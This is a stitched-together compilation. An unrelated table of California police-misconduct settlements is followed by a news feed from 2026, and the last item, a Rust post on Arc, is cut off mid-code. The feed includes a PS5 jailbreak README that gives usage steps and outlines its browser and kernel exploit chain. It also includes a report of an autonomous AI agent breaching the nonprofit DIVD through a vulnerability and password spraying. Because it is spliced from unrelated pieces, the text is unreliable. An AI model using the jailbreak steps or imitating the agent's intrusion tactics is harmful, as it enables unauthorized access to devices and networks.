$1,490,000.00 2017-09-05 Los Angeles County CA Wrongful death
$1,500,000.00 2017-08-08 Los Angeles County CA Wrongful death; civil rights violations
$400,000.00 2017-07-18 Los Angeles County CA Wrongful death; excessive force
$190,000.00 2017-07-18 San Francisco CA Unlawful arrest
$2,970,000.00 2017-07-11 Los Angeles County CA Wrongful death; civil rights violations; excessive force
$3,300,000.00 2017-05-30 Los Angeles County CA Wrongful death; civil rights violations
$430,000.00 2017-05-09 Los Angeles County CA Automobile accident
$1,500,000.00 2017-04-18 Los Angeles County CA Wrongful death; excessive force
$250,000.00 2017-03-08 Los Angeles County CA Wrongful death; excessive force
$250,000.00 2017-01-31 Los Angeles County CA Wrongful death; negligence; indifference to medical needs
$650,000.00 2017-01-10 Los Angeles County CA Wrongful death; civil rights violations
$1,250,000.00 2016-12-13 Los Angeles County CA Wrongful death; civil rights violations
$1,250,000.00 2016-11-09 Los Angeles County CA Wrongful death; civil rights violations; infliction of emotional distress
$2,000,000.00 2016-11-09 Los Angeles County CA Wrongful death; civil rights violations
$2,750,000.00 2016-10-18 Los Angeles County CA Wrongful death; civil rights violations
$1,200,000.00 2016-10-04 Oakland CA Wrongful death
$475,000.00 2016-08-09 Los Angeles County CA Wrongful death; civil rights violations
$90,000.00 2016-07-26 San Francisco CA Excessive force; cruel and unusual punishment
$90,000.00 2016-07-26 San Francisco CA Excessive force; cruel and unusual punishment
$1,300,000.00 2016-05-03 Los Angeles County CA Wrongful death
$150,000.00 2016-04-05 Los Angeles County CA Wrongful death; excessive force
$178,000.00 2016-03-01 Los Angeles County CA Excessive force
$500,000.00 2016-02-09 Los Angeles County CA Wrongful death; civil rights violations
$375,000.00 2016-02-02 Los Angeles County CA Wrongful death; excessive force
$150,000.00 2016-01-19 Los Angeles County CA Wrongful death; excessive force
$1,625,000.00 2016-01-19 Los Angeles County CA Wrongful death; civil rights violations
$499,999.00 2016-01-05 Los Angeles County CA False arrest; assault and battery
$8,850,000.00 2015-11-10 Los Angeles County CA Wrongful death; excessive force
$6,150,000.00 2015-11-03 Los Angeles County CA Sexual assault; false imprisonment
$700,000.00 2015-11-03 Los Angeles County CA Wrongful death; excessive force
$375,000.00 2015-09-15 Los Angeles County CA Wrongful death; excessive force
$4,700,000.00 2015-09-01 Los Angeles County CA Wrongful death; excessive force
$500,000.00 2015-08-11 Los Angeles County CA False arrest; excessive force
$5,000,000.00 2015-08-04 Los Angeles County CA Wrongful death; excessive force
$549,000.00 2015-08-04 Los Angeles County CA False arrest; excessive force
$1,500,000.00 2015-06-09 Los Angeles County CA Wrongful death; excessive force
$230,000.00 2015-05-19 Oakland CA Excessive force
$45,000.00 2015-05-19 Oakland CA Excessive force
$200,000.00 2015-05-05 Los Angeles County CA False arrest; excessive force
$5,300,000.00 2015-04-07 Los Angeles County CA Wrongful death; excessive force
$1,500,000.00 2015-02-17 Los Angeles County CA Wrongful death
$350,000.00 2015-02-17 Los Angeles County CA Medical neglect
$40,000.00 2015-02-03 Oakland CA Wrongful arrest
$450,000.00 2014-12-02 Los Angeles County CA False arrest; excessive force
$335,000.00 2014-11-18 Los Angeles County CA Excessive force; false arrest
$280,000.00 2014-11-05 Los Angeles County CA Wrongful death; excessive force
$15,000.00 2014-10-07 Oakland CA Excessive force
$309,636.00 2014-09-16 Los Angeles County CA Wrongful death; civil rights violations
$25,000.00 2014-07-15 Oakland CA Wrongful arrest
$110,000.00 2014-06-17 Oakland CA Excessive force
$1,845,000.00 2014-02-18 Los Angeles County CA Wrongful death
$135,000.00 2013-12-17 Los Angeles County CA False arrest
$650,000.00 2013-10-29 Los Angeles County CA Wrongful death; excessive force
$875,000.00 2013-09-10 Los Angeles County CA Wrongful death; excessive force
$479,500.00 2013-07-16 Los Angeles County CA False arrest; excessive force
$750,000.00 2013-07-09 Los Angeles County CA Wrongful death; excessive force
$200,000.00 2013-07-09 Los Angeles County CA Civil rights violations; assault and battery; negligence
$479,500.00 2013-07-09 Los Angeles County CA False arrest; excessive force
$150,000.00 2013-06-18 Los Angeles County CA Sexual harassment; gender discrimination; retaliation
$550,000.00 2013-06-18 Los Angeles County CA False arrest; civil rights violations
$225,000.00 2013-06-18 Oakland CA Wrongful death; civil rights violations
$50,000.00 2013-05-21 Oakland CA Wrongful death; civil rights violations
$350,000.00 2012-12-04 Los Angeles County CA False arrest; excessive force
$900,000.00 2012-07-31 Los Angeles County CA Wrongful death
$600,000.00 2012-07-31 Los Angeles County CA False arrest; excessive force
$400,000.00 2012-07-31 Los Angeles County CA Excessive force; false arrest
$400,000.00 2012-07-31 Los Angeles County CA False arrest; excessive force
$199,000.00 2012-07-03 Los Angeles County CA Excessive force; false arrest
$50,000.00 2012-06-18 San Leandro CA Wrongful death
$750,000.00 2012-06-12 Los Angeles County CA Wrongful death; automobile accident
$200,000.00 2012-04-03 Los Angeles County CA False arrest; illegal search
$43,000.00 2012-04-03 Oakland CA Excessive force
$22,000.00 2011-11-15 Oakland CA Excessive force
$1,700,000.00 2011-11-01 Oakland CA Wrongful death; excessive force
$500,000.00 2011-08-16 Los Angeles County CA Wrongful death;
$300,000.00 2011-03-01 Oakland CA False arrest
$500,000.00 2010-11-09 Oakland CA Wrongful death
$500,000.00 2010-10-19 Oakland CA Wrongful death; excessive force
$350,000.00 2010-10-12 Los Angeles County CA Wrongful death; excessive force
$500,000.00 2010-07-20 Oakland CA Wrongful death
$40,000.00 2010-06-01 Oakland CA Excessive force
$15,000.00 2010-04-20 Oakland CA Excessive Force; false imprisonment
$35,000.00 2010-02-02 Oakland CA Wrongful arrest; warrantless entry
$195,000.00 2009-02-10 Los Angeles County CA False arrest; excessive force
$250,000.00 2006-05-30 Oakland CA Excessive force
$1,500,000.00 2006-05-02 Oakland CA False arrest; excessive force
$75,000.00 2005-02-01 Oakland CA Excessive force
$19,900.00 2004-05-04 Oakland CA False arrest; excessive force
$450,000.00 2004-04-20 Oakland CA False arrest; excessive force
$35,000.00 2004-03-16 Oakland CA False arrest
$15,000.00 2004-03-16 Oakland CA False arrest
$450,000.00 2004-03-16 Oakland CA Excessive force
$10,000.00 2004-02-17 Oakland CA False arrest; assault and battery
$10,000.00 2004-02-17 Oakland CA Warrantless search
$6,000.00 2004-02-17 Oakland CA Automobile accident
$45,000.00 2004-01-20 Oakland CA False arrest
$19,500.00 2004-01-20 Oakland CA Excessive force; civil rights violations
$13,500.00 2004-01-06 Oakland CA Excessive force
$45,000.00 2004-01-06 Oakland CA False arrest
$15,000.00 2004-01-06 Oakland CA Civil rights violations
$22,500.00 2003-12-16 Oakland CA Excessive force
$20,750.00 2003-09-16 Oakland CA Automobile accident
$15,000.00 2003-09-16 Oakland CA Excessive force

What if Jev spoke Arrow?

Hacker News
columnar.tech
2026-09-29 12:25:09
Comments...
Original Article

Jev is TypeSafe AI’s new model for turning natural language and application state into typed decisions. You supply the context and define the possible answers. Jev returns choices, scores, and probabilities that your code can use directly. The API delivers those answers as JSON. If you’ve managed to avoid hearing about Jev lately, the rock you’re hiding under has excellent soundproofing.

Jev is part of a wider effort to make AI outputs easier to use in code. Other tools, such as Outlines from .txt , use constrained decoding to make existing language models produce outputs that conform to a schema. TypeSafe took a different approach. In its announcement , the company describes a new model architecture, a parallel sampler, and a training method called Reinforcement Learning for Calibrated Decisions. Jev produces probabilities in parallel, avoiding the work of generating an answer token by token. TypeSafe reports substantial gains in speed and cost compared with general-purpose LLMs in its decision workflows.

Jev is a new primitive, and nobody yet knows the full scope of what it will make possible. This post reflects our thinking at this point in time, and we expect it to evolve. But some powerful patterns are already clear. TypeSafe’s docs describe several . Speculative fan-out asks many questions in one call, including speculative ones, and lets your code decide which answers are relevant. Confidence-gated routing treats confidence as a second decision axis, so your code can take a different path when Jev is unsure. Composite scoring combines several dimensions of judgment into a single score. Intent routing classifies what a user wants and sends the request to the right handler.

Together, these patterns open the door to fundamentally probabilistic workflows and pipelines, in places where until recently we would have assumed only deterministic ones were practical. The sophistication you can achieve is astounding.

Pipelines like these move a lot of structured data, which got us curious about how Jev might work with another technology that combines structure with performance and efficiency: Apache Arrow . In Stop paying the JSON tax , we described how Arrow can speed up data pipelines by avoiding conversions to JSON and back. Could it do that here?

Modeling Jev answers as Arrow

To explore that question, we first designed an Arrow schema to represent Jev’s answers. Jev has three question types , each with a different answer shape:

Question type What it returns
Choice A selected option, a probability for every option, and a confidence score.
Noul The probability that the answer to a yes/no question is yes. There is no separate confidence field.
Score A position on ordered levels, which can fall between levels; a probability for each level, confidence, and a legend describing the levels.

We chose to represent each question’s answers as an Arrow column. The question’s definition tells us the column’s type before inference starts. Choice labels and Score legends describe the possible answers, so we can put them in the schema’s field metadata. The predictions and probabilities go in the data buffers. Arrow extension types let us attach that semantic meaning to ordinary Arrow storage types:

Choice
  struct<
    choice: uint8 not null,
    confidence: float64 not null,
    probabilities: fixed_size_list<item: float64 not null>[N] not null
  > not null
  metadata: {"labels":["returns","shipping","billing","other"]}

Noul
  float64 not null
  metadata: {}

Score
  struct<
    score: float64 not null,
    confidence: float64 not null,
    probabilities: fixed_size_list<item: float64 not null>[N] not null
  > not null
  metadata: {"legend":["Can wait","Within a few days","Today"]}

N is the number of choices or score levels. Choice stores a one-byte index into the shared labels. Fixed-size probability vectors need no per-row offsets, and 64-bit floats preserve the values returned by the TypeSafe Python SDK. The schema metadata supplies the meaning of our choice indices and score levels. Together, the values and metadata are enough to reconstruct each original answer object.

The TypeSafe API returns these answers as JSON today. If it returned Arrow directly using this schema, tools such as pandas , Polars , DuckDB , and Apache DataFusion could consume the results without first deserializing JSON and rebuilding typed columns. Compatible consumers can use the Arrow buffers without copying them.

This is already a common way to exchange structured data. Databricks , Snowflake , and ClickHouse can return query results in Arrow format over HTTP. Hugging Face Datasets uses Arrow internally and lets you retrieve Arrow tables directly. Giving Jev an Arrow output option would let its answers join those same data workflows.

From one state to many

Jev doesn’t offer Arrow output today, so our goal was to simulate what using the TypeSafe API would look like if it did. That meant taking Jev from the operational layer, where it makes decisions one interaction at a time, to the analytic layer, where the unit of work is a whole table. There, we hit a more basic problem with the request format.

A TypeSafe API request contains a state (the context to evaluate) and questions (a map of the judgments to make about it). The API is wonderfully designed for asking multiple questions about one state. But it has no native batch operation for asking the same set of questions about many independent states.

For example, take a live customer interaction. You might want to identify intent, score urgency, check refund eligibility, and look for signs of fraud. You can send the context once, ask all those questions together, and Jev evaluates them independently in parallel. The documentation makes good use of this . But before trusting those judgments in a live application, you’d want to validate them. Part of that is reasoning about the probabilities Jev should produce across the range of states it might see. But you’d also want to run it against a representative sample of historical customer interactions and compare its answers with known outcomes. That’s the bulk workload we’re interested in: lots of states, a fixed set of questions. Jev’s speed and pricing make it an appealing fit for that work. The obstacle is the API: it has no bulk endpoint, so you need to make thousands or millions of separate API calls, one per state.

Building Jevaro

We weren’t ready to give up on the experiment, so we built Jevaro : a small Python proxy server, with Python and JavaScript clients. It accepts multiple states and a shared questions map in one request, calls Jev for each state, and returns an Arrow IPC stream using the schema above . Results arrive in input order. The schema goes out immediately, and answers follow as they become available in that order.

Improving throughput took several rounds of tuning. Opening fresh connections repeatedly adds network and TLS setup time; waiting for each answer before sending the next request prevents calls from overlapping. We reused a long-lived HTTP/2 connection pool, kept a window of asynchronous requests pending, and refilled it before writing result batches. SDK retries recover dropped connections and back off on rate limits and overload responses. All of this preserves the input order of the results.

Even after that tuning, every state still needs a separate upstream HTTP request and JSON response. We’d expect a native bulk call returning an Arrow stream directly from the API to achieve orders of magnitude better throughput by avoiding all that repeated request handling and JSON conversion. At a minimum, it could shift the bottleneck from API overhead to inference itself.

For now, Jevaro lets us experiment with that interface. We could have put the request logic directly in each SDK, but a batching proxy server gives us one implementation of concurrency, retries, ordering, and Arrow serialization. Browser clients can also use it without receiving the TypeSafe key. The cost is an extra process and network hop; the same request optimizations could run in a client.

Using Jevaro from Python and JavaScript

To try it with uv , set your TypeSafe API key and start the server:

export TYPESAFE_API_KEY="your-api-key"
uvx jevaro-server

Leave that running. Save this as example.py , then run uv run --with jevaro example.py in another terminal:

from jevaro import Noul, TypeSafeClient

with TypeSafeClient(base_url="http://127.0.0.1:8000") as client:
    with client.system_one(
        states=["Please refund the shoes.", "Where is my parcel?"],
        questions={"refund": Noul(instructions="Is a refund being requested?")},
    ) as reader:
        print(reader.schema)
        for batch in reader:
            if batch.num_rows:
                print(batch.to_pylist())

reader is a PyArrow RecordBatchReader . This prints the schema and each state’s refund probability. To collect a PyArrow table instead, replace the loop with table = reader.read_all() inside the context manager.

For JavaScript, run npm install jevaro , save this as example.mjs , and run node example.mjs :


const client = new TypeSafeClient({ baseURL: "http://127.0.0.1:8000" });
const reader = await client.systemOne({
  states: ["Please refund the shoes.", "Where is my parcel?"],
  questions: { refund: noul("Is a refund being requested?") },
});

try {
  console.log(reader.schema.toString());
  for await (const batch of reader) {
    for (const row of batch) console.log(row.refund);
  }
} finally {
  await reader.cancel();
}

The JavaScript client returns an Apache Arrow AsyncRecordBatchStreamReader . The SDK also works in browsers.

Throughput and cost

To measure Jevaro’s throughput, we tested a batch of 10,000 synthetic customer messages, each evaluated with a Choice for department, a Score for urgency, and a Noul for whether a refund was requested. Our fastest run returned all 10,000 rows in 21.5 seconds , about 464 states per second . The client received the schema after 34 milliseconds and its first answer row after 290 milliseconds. The elapsed time includes upstream calls, retries, and receiving the complete Arrow result locally; saving it to disk happens afterward. The TypeSafe API’s rate limits are changing often right now, so your throughput may differ. Based on reported token usage and TypeSafe’s published pricing , the estimated cost was $0.20 for 30,000 answers .

Jev handled this workload inexpensively and relatively quickly, given the overhead of 10,000 separate API calls. That doesn’t yet tell us how much faster it could be with a bulk API that returned Arrow directly. Jevaro still makes one API call per state, and the TypeSafe API serializes each response as JSON. Jevaro parses those responses and builds Arrow arrays. We’ve optimized that conversion and moved it out of user code, but it still happens.

To remove that overhead, batching and Arrow output need to happen in the TypeSafe API itself. We’d love to test a native batch endpoint with the TypeSafe team and measure the difference. In the meantime, we’ll keep refining Jevaro: adding Arrow input, improving how it adapts to evolving API rate limits, and experimenting further with output record batch sizes. What would you want from an Arrow interface to Jev? Open an issue and tell us.

To be clear, our wish list for the TypeSafe API is narrow: a bulk endpoint that returns Arrow. Everything else about Jev has us excited, especially the prospect of pipelines that mix probabilistic decisions with deterministic data processing. We’re building some novel capabilities along those lines into Columnar Gateway .

Next steps

OpenAI DevDay 2026 live blog

Simon Willison
simonwillison.net
2026-09-29 11:55:13
I'm at OpenAI DevDay today, in Fort Mason, San Francisco. Same as last year I'll be live blogging the keynote and some other notes during the day. OpenAI gave me a free ticket and a seat in the "creator" area for the keynote. Tags: ai, openai, generative-ai, llms, coding-agents, live-b...
Original Article

29th September 2026

I’m at OpenAI DevDay today, in Fort Mason, San Francisco. Same as last year I’ll be live blogging the keynote and some other notes during the day.

OpenAI gave me a free ticket and a seat in the “creator” area for the keynote.

09:27 I'm in the room for the keynote, which starts in half an hour.

This year I vibe-coded a system for more easily adding photos to my live blog. I intended to do that using Codex Cloud (I built it on my phone on the way to the venue) but ran into problems with that and switched to Claude Code for web instead.
Attendees sit facing a large stage screen displaying a pattern made of colored dots in a bright industrial hall with exposed roof trusses and stage lights.

New PlayStation 5 Console Jailbreak Released

Hacker News
github.com
2026-09-29 11:44:41
Comments...
Original Article

Supported firmware: 7.00 through 13.60.

Usage

  • In the network settings, set Primary DNS to 45.56.67.85 (Recommended)
  • Run python serve.py locally, or open https://ntfargo.github.io/Relapse-Exploit/ on the PS5.
  • The default payloads are stored in payloads/ after a successful run, the ELF loader listens on port 9021 .

Stability notes

Webkit may need several attempts, reload the page if the browser stalls. The kernel exploit may hang or panic the console, so reboot before trying again if that happens.

Exploit chain

Browser stage uses JSC info leaks and a structured clone object pool mismatch to corrupt a typedarray. The kernel stage combines a address leak with an aio_multi_wait uaf race to establish kernel r/w.

Credits

ntfargo, ufm42, Sonic_Iso, Jordy, Dr. Yenyen, TheFlow, SlidyBat, Flatz, cow, nhk, bollarz, Sleirsgoevy, EchoStretch, EarthOnion.

Disclaimer

This project is intended for educational and security research purposes only . It does not endorse piracy, unauthorized access, or misuse of commercial devices. Use it only on devices you own or are authorized to test, and comply with applicable laws and regulations.

The software is provided as-is, without warranty. You assume the risks of using it, including system instability, data loss, and account bans. The maintainers accept no liability for resulting damage.

[$] The kernel from a PostgreSQL point of view

Linux Weekly News
lwn.net
2026-09-29 11:42:30
Andres Freund has a few claims to fame, but chief among them is his many years of work to improve the performance of the PostgreSQL relational database management system. That work requires working with — or around — many Linux kernel features and behaviors. He put in an appearance at the 2026 edi...
Original Article
The page you have tried to view ( The kernel from a PostgreSQL point of view ) is currently available to LWN subscribers only. Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on October 8, 2026)

Automated AI agent used to breach cybersecurity nonprofit DIVD

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 11:39:19
The Dutch Institute for Vulnerability Disclosure (DIVD) suffered an AI-driven cyberattack that the organization described as "loud and very, very messy." [...]...
Original Article

Automated AI agent used to breach cybersecurity nonprofit DIVD

The Dutch Institute for Vulnerability Disclosure (DIVD) suffered an AI-driven cyberattack that the organization described as “loud and very, very messy.”

Evidence uncovered during the ongoing investigation indicates the attacker exploited a vulnerability, but the attack's purpose and impact remain unclear at this stage.

DIVD is a nonprofit organization of volunteer security researchers that scans the internet for systems affected by known vulnerabilities, notifies their owners, and provides information on how to mitigate the risks.

Late last week, the organization said it had been hacked after seven years of uneventful operations, with the intrusion carried out autonomously by an AI agent.

The organization described the attack as “loud and very very messy,” leaving plenty of evidence to help them reconstruct what happened, but the incident was serious nonetheless.

“This is an attack we have not seen before. Not because it’s our first, but because the modus operandi indicates that this is an agentic AI-powered attack,” DIVD explained .

The organization launched an investigation and informed the police, the Autoriteit Persoonsgegevens (data protection), and the National Cyber Security Center (NCSC).

In an update on Monday, DIVD provided additional information about the incident but withheld full details to avoid influencing the investigation or putting more victims at risk.

"The attack itself was loud and very very messy. We could see the agent working automated, because after every action it decided the next step itself, at the speed of light and sloppy logic or pattern," DIVD said .

The threat actor exploited a “technical vulnerability” in an undisclosed system, which DIVD specifically said was not Citrix NetScaler, and then used an automated AI agent to perform post-exploitation activities.

According to the researchers, the AI agent did "some pretty dumb things," including interfering with its own adversary-in-the-middle attack via password spraying.

The agent worked autonomously on DIVD’s network, deciding the next step itself, and over-explaining its decisions in its comments.

DIVD believes that the agent was poorly trained and configured for such operations, leaving behind sufficient information to help researchers with reverse-engineering the incident.

The organization promised to provide a more detailed update on October 1, and to notify other possible victims of the same vulnerability as soon as they can.

BleepingComputer has contacted DIVD to learn more about the type and patch state of the undisclosed flaw leveraged in this attack, but we have not heard back as of publication.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Security updates for Tuesday

Linux Weekly News
lwn.net
2026-09-29 11:38:42
Security updates have been issued by AlmaLinux (cockpit-image-builder, expat, ipa, kernel, kernel-rt, resteasy, ruby, ruby4.0, ruby:3.3, and ruby:4.0), Debian (dovecot, flatpak, glance, kernel, libdbi-perl, lxml, rsync, swift, and wordpress), Fedora (chromium, freeipa, freerdp, grub2, NetworkManager...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2026:71543 10 cockpit-image-builder 2026-09-28
AlmaLinux ALSA-2026:72448 8 expat 2026-09-28
AlmaLinux ALSA-2026:72279 10 ipa 2026-09-29
AlmaLinux ALSA-2026:72468 8 kernel 2026-09-28
AlmaLinux ALSA-2026:71700 9 kernel 2026-09-29
AlmaLinux ALSA-2026:72467 8 kernel-rt 2026-09-28
AlmaLinux ALSA-2026:72424 9 resteasy 2026-09-28
AlmaLinux ALSA-2026:72785 10 ruby 2026-09-29
AlmaLinux ALSA-2026:72286 9 ruby 2026-09-28
AlmaLinux ALSA-2026:72427 10 ruby4.0 2026-09-28
AlmaLinux ALSA-2026:72485 9 ruby:3.3 2026-09-28
AlmaLinux ALSA-2026:72484 9 ruby:4.0 2026-09-28
Debian DSA-6526-1 stable dovecot 2026-09-28
Debian DSA-6524-1 stable flatpak 2026-09-28
Debian DLA-4800-1 LTS glance 2026-09-29
Debian DSA-6528-1 stable kernel 2026-09-29
Debian DLA-4798-1 LTS libdbi-perl 2026-09-28
Debian DLA-4799-1 LTS lxml 2026-09-28
Debian DSA-6527-1 stable rsync 2026-09-28
Debian DLA-4801-1 LTS swift 2026-09-29
Debian DSA-6525-1 stable wordpress 2026-09-28
Fedora FEDORA-2026-d3a0471c75 F43 NetworkManager-iodine 2026-09-29
Fedora FEDORA-2026-5463db437e F44 NetworkManager-iodine 2026-09-29
Fedora FEDORA-2026-ccf41b012c F45 NetworkManager-iodine 2026-09-29
Fedora FEDORA-2026-1b63888725 F43 NetworkManager-l2tp 2026-09-29
Fedora FEDORA-2026-3a264a1bb3 F44 NetworkManager-l2tp 2026-09-29
Fedora FEDORA-2026-8729b61cd3 F43 chromium 2026-09-29
Fedora FEDORA-2026-5812baee0f F43 freeipa 2026-09-29
Fedora FEDORA-2026-ff8f6f4444 F45 freerdp 2026-09-29
Fedora FEDORA-2026-72dbe745c7 F45 grub2 2026-09-29
Fedora FEDORA-2026-7c46481544 F43 perl-Catalyst-Plugin-Static-Simple 2026-09-29
Fedora FEDORA-2026-2d96cf2594 F44 perl-Catalyst-Plugin-Static-Simple 2026-09-29
Fedora FEDORA-2026-4d5a716383 F45 perl-Catalyst-Plugin-Static-Simple 2026-09-29
Fedora FEDORA-2026-3b893ccf2d F44 perl-Dancer2 2026-09-29
Fedora FEDORA-2026-5e3eab9a07 F45 perl-Dancer2 2026-09-29
Fedora FEDORA-2026-219b6aef6c F43 perl-HTML-FormFu 2026-09-29
Fedora FEDORA-2026-18537daffc F44 perl-HTML-FormFu 2026-09-29
Fedora FEDORA-2026-94d32d2e8e F45 perl-HTML-FormFu 2026-09-29
Fedora FEDORA-2026-9a652403b1 F45 python-quart-trio 2026-09-29
Fedora FEDORA-2026-700dc0d93d F44 python-streamlink 2026-09-29
Fedora FEDORA-2026-9a652403b1 F45 python-streamlink 2026-09-29
Fedora FEDORA-2026-700dc0d93d F44 python-urllib3 2026-09-29
Fedora FEDORA-2026-9a652403b1 F45 python-urllib3 2026-09-29
Fedora FEDORA-2026-ad90eab763 F44 vlc 2026-09-29
Mageia MGASA-2026-0459 10 libxml2 2026-09-28
Mageia MGASA-2026-0460 10 p11-kit 2026-09-28
Mageia MGASA-2026-0461 10 pam 2026-09-28
Mageia MGASA-2026-0458 9 php 2026-09-28
Slackware SSA:2026-271-01 groff 2026-09-28
Slackware SSA:2026-271-02 pcre2 2026-09-28
SUSE SUSE-SU-2026:4380-1 SLE15 389-ds 2026-09-28
SUSE SUSE-SU-2026:4376-1 SLE15 oS15.6 ImageMagick 2026-09-28
SUSE SUSE-SU-2026:4372-1 MP4.3 SLE15 amazon-ssm-agent 2026-09-28
SUSE SUSE-SU-2026:4358-1 oS15.3 erlang27 2026-09-28
SUSE SUSE-SU-2026:4374-1 SLE15 oS15.4 exiv2 2026-09-28
SUSE SUSE-SU-2026:4367-1 SLE15 oS15.6 glib2 2026-09-29
SUSE SUSE-SU-2026:4373-1 SLE15 gnome-shell 2026-09-28
SUSE SUSE-SU-2026:4362-1 SLE15 hplip 2026-09-28
SUSE SUSE-SU-2026:4371-1 SLE15 oS15.4 hplip 2026-09-28
SUSE SUSE-SU-2026:4364-1 SLE15 oS15.6 hplip 2026-09-28
SUSE SUSE-SU-2026:4369-1 SLE15 oS15.6 kernel 2026-09-28
SUSE SUSE-SU-2026:4378-1 SLE15 libheif 2026-09-28
SUSE SUSE-SU-2026:4368-1 SLE15 SLE5.3 SLE5.4 SLE5.5 SLE-m5.3 SLE-m5.4 SLE-m5.5 oS15.4 oS15.5 oS15.6 libsodium 2026-09-28
SUSE SUSE-SU-2026:4363-1 SLE15 oS15.6 libtpms 2026-09-28
SUSE SUSE-SU-2026:4355-1 SLE15 oS15.4 nodejs16 2026-09-28
SUSE SUSE-SU-2026:4386-1 SLE15 oS15.6 perl-DBI 2026-09-29
SUSE SUSE-SU-2026:4365-1 SLE15 oS15.6 python-soupsieve 2026-09-28
SUSE SUSE-SU-2026:4370-1 SLE15 oS15.6 redis 2026-09-28
SUSE SUSE-SU-2026:4375-1 SLE15 oS15.5 redis7 2026-09-28
SUSE SUSE-SU-2026:4377-1 SLE15 oS15.6 redis7 2026-09-28
SUSE SUSE-SU-2026:4366-1 SLE15 swtpm 2026-09-29
SUSE SUSE-SU-2026:4379-1 SLE15 wireshark 2026-09-28
Ubuntu USN-8487-2 14.04 curl 2026-09-29
Ubuntu USN-8840-1 14.04 16.04 18.04 20.04 22.04 24.04 26.04 libevent 2026-09-29
Ubuntu USN-8729-6 22.04 24.04 linux-aws, linux-aws-6.8 2026-09-29
Ubuntu USN-8818-3 20.04 linux-aws-5.15, linux-azure-5.15, linux-azure-fde-5.15, linux-intel-iotg-5.15 2026-09-29
Ubuntu USN-8819-3 14.04 16.04 18.04 linux-aws-hwe, linux-azure, linux-azure-4.15 2026-09-29
Ubuntu USN-8816-2 24.04 26.04 linux-gcp, linux-gcp-7.0, linux-oem-7.0 2026-09-29
Ubuntu USN-8842-1 22.04 24.04 linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency 2026-09-29
Ubuntu USN-8728-3 24.04 linux-oracle-7.0 2026-09-29

Pining for Arc Downcasting in Rust

Lobsters
wolfgirl.dev
2026-09-29 11:35:14
Comments...
Original Article

In the course of writing my build driver , I came across a bit of an unusual problem, for which I made a bit of an usual solution. I think the solution is interesting and would like to talk about it, but to understand anything we must first understand the problem at hand.

Consider The Case Of The Humble Concurrent Cache

Suppose we have some expensive function we'd like to put a cache in front of. Furthermore, suppose we'd like to access this cache from multiple threads. A simple example follows ( playground link ):

enum JSON {
    F64(f64),
    String(String),
    Vec(Vec<JSON>),
    Object(HashMap<String, JSON>),
}

struct Proxy {
    client: HTTPClient,
    cache: RWLock<HashMap<String, JSON>>,
}

impl Proxy {
    fn get(&self, key: &str) -> JSON {
        // 1.
        {
            let cache = self.cache.read().unwrap();
            if let Some(value) = cache.get(key) {
                return value.clone();
            }
        }

        // 2.
        let value = self.client.get(key);
        {
            let mut cache = self.cache.write().unwrap();
            cache.insert(key.to_string(), value.clone());
        }
        value
    }
}

This code has an "early exit" path (1) where it returns a value from the cache if it's present, and a "late exit" path (2) where it calls the expensive function, then inserts the resulting value into the cache.

Please ignore the many, many obvious problems with this implementation 1 . Instead, let's focus on the one problem that bothers me the most: there's fair bit of .clone() action going on here!

Obi-Wan Kenobi walking down a hallway with the Kaminoans, observing the clones below. They tell him "200,000 units are ready, with a million more well on the way."
Obi-Wan Kenobi walking down a hallway with the Kaminoans, observing the clones below. They tell him "200,000 units are ready, with a million more well on the way."

Technically, it's just one .clone() per call: one on early exit to take value out of the cache, and one on late exit to put value into the cache. But if those values are big/tree-shaped/otherwise expensive to clone, this cost can dominate, minimizing the savings conferred by a cache. In my code, I found this to be the case, so we gotta do something about it.

Let's Get Rid Of The Clones?

Assume that, with the way we use this data, read-only access is more than enough. Shared references are read-only & cheap to Copy , so using those instead of .clone() -ing the entire value seems good. If some later part of the code really needs to take ownership, we can just .clone() there, saving time in the average case. So, we'd like to change the signature for get() to be:

impl Proxy {
    fn get<'a, 'b>(&'a self, url: &'b str) -> &'a JSON { ... }
}

But we can't do this!! Because our cache is behind a mutex, the only way we can get references to its contents is thru temporary handles. Those handles, while live, hold a lock on the cache, plus they only live for the body of the function, a not for all of 'a . Even if we could return one of those handles, that'd be equivalent to holding the lock outside the function, which is very bad. Locks should only be held for VERY SHORT amounts of time unless ur into that sorta thing next month ;)

Let's Make The Clones Cheaper

So, no references. What other types can we use? What we want is something with all the following properties:

  1. It allows for read access to our data. That is, it allows us to get an &JSON somehow.
  2. It has no lifetime parameters ( 'a , the only lifetime we have access to, is too long).
  3. It is cheap to .clone() , even if the underlying value is not cheap to .clone() .

These requirements hint we should probably still be looking for some sort of pointer... Among standard library types, we have the following options 2 :

Like any good Rustacean, we care a lot about safety & concurrency, so Arc is the obvious pick here :3 Modifying the example to use it is straightforward ( playground link ):

struct Proxy {
    client: HTTPClient,
    cache: RWLock<HashMap<String, Arc<JSON>>>, // new!
}

impl Proxy {
    fn get(&self, url: &str) -> Arc<JSON> { // new!
        {
            let cache = self.cache.read().unwrap();
            if let Some(value) = cache.get(url) {
                return value.clone();
            }
        }

        let value = Arc::new(self.client.get(url)); // new!
        {
            let mut cache = self.cache.write().unwrap();
            cache.insert(url.to_string(), value.clone());
        }
        value
    }
}

Other than the three lines with Arc added to them, this implementation looks the exact same as before. But now our clones are cheaper, so we're happy, yay!!

So What's This About Downcasting?

I hope the above section convinced you having an Arc "owned value that acts like a reference" is both normal to want & possible to achieve. Switching gears a bit, I'd like to discuss an interesting shortcoming with them: they don't fit into Rust's type system very well.

Supposed we know for a fact that certain JSON values are strings, and we're only interested in the JSON::String variant of them. With an owned value or a shared reference, we can just pattern-match to "downcast" from a JSON to a String , or a &JSON to a &String .

impl JSON {
    fn to_str(self) -> Option<String> {
        match self {
            Self::String(s) => Some(s),
            _ => None,
        }
    }
    
    fn as_str(&self) -> Option<&String> {
        match self {
            Self::String(s) => Some(s),
            _ => None,
        }
    }
}

But if we have an Arc<JSON> , we can't get another Arc<String> the same way!

impl JSON {
    fn doesnt_exist(value: Arc<JSON>) -> Option<Arc<String>> {
        match value.deref() {
